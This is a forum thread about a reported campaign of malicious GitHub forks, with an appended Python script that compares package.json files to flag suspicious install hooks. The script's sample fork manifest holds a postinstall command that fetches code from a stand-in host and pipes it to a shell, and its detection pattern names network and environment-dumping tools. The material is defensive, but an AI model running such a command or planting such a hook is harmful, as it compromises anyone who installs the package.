GitHub Bug Hunt Gone Terribly Wrong
-
Apparently a number of malware users, for the last 14 days, have been trying to target various projects in GitHub, and trying to implant malicious malware into 35k forked projects. Looks like GitHub clamped down on it pretty quick, but just thinking how if some of the big major projects could’ve been affected…it’s a bit freaking yikes.
I know a lot of MU runners use GitHub to work on their own various projects. I wasn’t sure if anyone here had heard of this attack and I doubt anyone’s mush GitHub stuff was affected, but considering it was 35k potentially affected projects, I just wanted to ask if everyone’s stuff is okay.
And apparently it was one big test of cybersecurity which…seems like a whole OTHER yikes.
To those who might be wondering what happened, here’s a video that explains everything that happened.
-
The important distinction is that no repositories were compromised. This was attackers creating forks of popular repos and inserting code that would compromise people who used the fork.
So for instance …/evennia/evennia wasn’t infected, but someone might have made …/malwarefork/evennia and hoped that someone not paying attention would grab that version instead, exposing themselves.
-
@shit-piss-love Trying to prove a point something having an exposure or weakness on a public facing thing seems like…a bad idea?
Like the video stated, if someone tried to affect the Linux kernel, again, bad idea if you’re just trying to prove a point.
-
I hadn’t heard that it was an awareness trick. BTW the link you posted doesn’t seem to work.
edit: Ahh okay I get what you mean about proving a point now; people are saying the original tweet was just to get clout. The fact that they have not posted a retraction is bad form for sure.
-
@shit-piss-love Thanks. Fixed it to a proper link.
-
Just to add to the clarification, and I watched the video to make sure I had the same context, nothing was compromised and there’s little chance any of this code found its way into any open source projects. Even the “example” brought up in the video with the version change actually had a line for a post-install addition that was so obviously malicious that I’m surprised the guy in the video didn’t say anything.
@shit-piss-love is 100% right on this, and being able to fork and make pull requests is expected operation for GitHub. Whether there was an attempt at collecting a bug bounty or proving a point (though I don’t see the point), it’s a bit of a nothing-burger.
I’d ask that you change the title of the thread. I know it’s not intentional, but it’s misleading regarding the security of github projects.
-
@glitch That’s fair. I was writing this thread as I was watching video content on the whole thing and I had already created the thread about five minutes into watching it.
It’s a valid point. My main intention was to bring awareness to the situation since I knew plenty of people who run mushes also have a lot of their code on GitHub, so it was an attempt to suggest that, ‘maybe go check your stuff just in case’. So wording the thread that way is on me for not just, oh I don’t know, finishing watching the video.
Regardless, name of thread changed.
-
It was good to point it out. I only knew what I do about this because I work in this industry. This strategy of trying to compromise people through modified clones is a constant thing. What was notable in this case was the original tweet claiming huge numbers like it was something new, and it went viral.
Something worth noting for people working on GitHub. An extension of this strategy is for the attackers to open PRs, with the compromising code, back to the original repo, hoping that a maintainer will assume that a forked repo represents a good faith development effort and fail to fully review the code and merge it. At that point, the core repo is compromised.
It’s always important to fully review code before you merge.
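A defender-side check for the pattern described in the two posts above (a fork whose manifest bumps the version and adds a post-install hook, and a PR from that fork carrying the same change): an added Python example, not code from this thread or from GitHub, assuming an npm-style package.json; the two manifests below are constructed samples, not taken from any real repository.

```python
import json
import re

# Lifecycle hooks npm runs automatically during `npm install`; a fork that adds
# or changes one of these is where a planted payload would execute.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Patterns a reviewer would want flagged inside an install hook: outbound
# fetches, piping into a shell, dumping the environment, decoding blobs.
SUSPICIOUS = re.compile(r"curl|wget|\| *(ba)?sh|printenv|\$\(env\)|eval|base64", re.I)


def compare_manifests(upstream: dict, fork: dict) -> list[str]:
    """Return human-readable findings for version and lifecycle-hook
    differences between an upstream package.json and a fork's copy."""
    findings = []
    if upstream.get("version") != fork.get("version"):
        findings.append(
            f"version changed: {upstream.get('version')} -> {fork.get('version')}"
        )
    up_scripts = upstream.get("scripts", {})
    fork_scripts = fork.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        before, after = up_scripts.get(hook), fork_scripts.get(hook)
        if before == after:
            continue  # hook untouched by the fork
        verdict = "added" if before is None else "changed"
        finding = f"{hook} {verdict}: {after!r}"
        if after and SUSPICIOUS.search(after):
            finding += "  [matches suspicious pattern]"
        findings.append(finding)
    return findings


# Constructed sample manifests (hypothetical project, hypothetical URL).
UPSTREAM = json.loads(
    '{"name": "example-mud", "version": "1.2.0", "scripts": {"test": "jest"}}'
)
FORK = json.loads(
    '{"name": "example-mud", "version": "1.2.1", "scripts": {"test": "jest", '
    '"postinstall": "curl -s http://example.invalid/x | sh"}}'
)

if __name__ == "__main__":
    for line in compare_manifests(UPSTREAM, FORK):
        print(line)
```

Run it against the upstream manifest and the PR's manifest before merging; any finding tagged as suspicious is a reason to read the full diff rather than trust the fork's intent.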